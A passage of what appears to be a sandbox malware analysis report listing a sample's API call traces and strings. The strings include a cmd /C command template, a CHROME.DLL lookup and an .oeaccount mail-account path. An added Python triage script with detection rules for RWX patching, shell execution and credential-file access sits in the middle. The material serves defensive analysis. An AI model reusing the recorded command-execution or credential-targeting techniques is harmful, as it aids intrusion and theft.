  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: HeapFreememcpy
  • String ID: ($Client
  • API String ID: 2443564160-90774469
  • Opcode ID: 4c92a37d4490a7167670f7697e6105d9cf60d964df118a6b4f918dcc470b9dca
  • Instruction ID: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
  • Opcode Fuzzy Hash: B4D02B712800C2031407A1815C313FA06B33E026DF89C6721FF64284848DD6DBE42B09
  • Instruction Fuzzy Hash: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
  • HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
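The per-function listings above (String ID, then the APIs with their arguments and the subcall expansions) are what a triager actually reads in this kind of report, and the interesting ones here are the combinations rather than single calls: VirtualProtect with protection 0x40 (PAGE_EXECUTE_READWRITE) next to a module lookup, CreateProcessA under a `cmd /C "%s> %s1"` string, a CreateFileA/WaitNamedPipeA pipe client, and the `account{*}.oeaccount` path. The script below is an added example and is not part of the Joe Sandbox report or of Joe Security's own tooling. It parses the text export format seen on this page into per-function blocks and applies a handful of triage rules; the sample input is copied from the listings above, trimmed to two functions, and the rule names and thresholds are the author's assumptions.

```python
import re

# Constructed sample input: two function blocks copied from the report above.
SAMPLE = """\
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 001D7B52
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
"""

# One API call line: optional subcall prefix, Api.MODULE(args) or bare Api.MODULE, then ref.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
# One metadata line such as "String ID: http" or "Total matches: 58".
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")

PAGE_EXECUTE_READWRITE = 0x40  # third VirtualProtect argument, flNewProtect


def parse_blocks(text):
    """Split the export into per-function blocks (metadata fields plus API calls)."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":          # each function block starts here
            cur = {"fields": {}, "calls": []}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur["calls"].append({"api": m["api"], "mod": m["mod"], "args": args,
                                 "ref": m["ref"], "subcall": m["sub"]})
            continue
        f = FIELD_RE.match(line)
        if f:
            cur["fields"][f["key"]] = f["val"]
    return blocks


def hex_arg(a):
    """An 8-hex-digit argument as int; '?' and symbolic arguments give None."""
    return int(a, 16) if re.fullmatch(r"[0-9A-F]{8}", a) else None


def triage(block):
    """Assumed triage rules for one block; returns short, human-readable findings."""
    names = {c["api"] for c in block["calls"]}
    string_id = block["fields"].get("String ID", "")
    findings = []
    # Code page made RWX right after a module/export lookup: inline-hook installer shape.
    rwx = [c for c in block["calls"] if c["api"] == "VirtualProtect"
           and len(c["args"]) >= 3 and hex_arg(c["args"][2]) == PAGE_EXECUTE_READWRITE]
    if rwx and names & {"GetModuleHandleA", "GetModuleHandleW", "GetProcAddress"}:
        findings.append("rwx-patch-after-module-lookup at ref %s" % rwx[0]["ref"])
    if names & {"CreateProcessA", "CreateProcessW"}:
        findings.append("shell-command-execution: %s" % string_id
                        if "cmd /C" in string_id else "process-creation")
    if "WaitNamedPipeA" in names:
        findings.append("named-pipe-client")
    if string_id.lower().endswith(".oeaccount"):
        findings.append("mail-account-file-access")
    return findings


def triage_report(text):
    """Map the first call ref of each block to its findings, skipping clean blocks."""
    out = {}
    for b in parse_blocks(text):
        f = triage(b)
        if f and b["calls"]:
            out[b["calls"][0]["ref"]] = f
    return out


if __name__ == "__main__":
    for ref, findings in triage_report(SAMPLE).items():
        print(ref, ", ".join(findings))
```

The block key is the ref of the function's first listed call, which is the closest thing the text export has to a function address; subcall lines are kept with their parent so that a VirtualProtect buried two levels down still counts against the caller that reached it. Run on the full export of this report the rules fire on the GetModuleHandle/StrChr block, the `cmd /C` block and the WaitNamedPipeA pipe client shown above.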
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
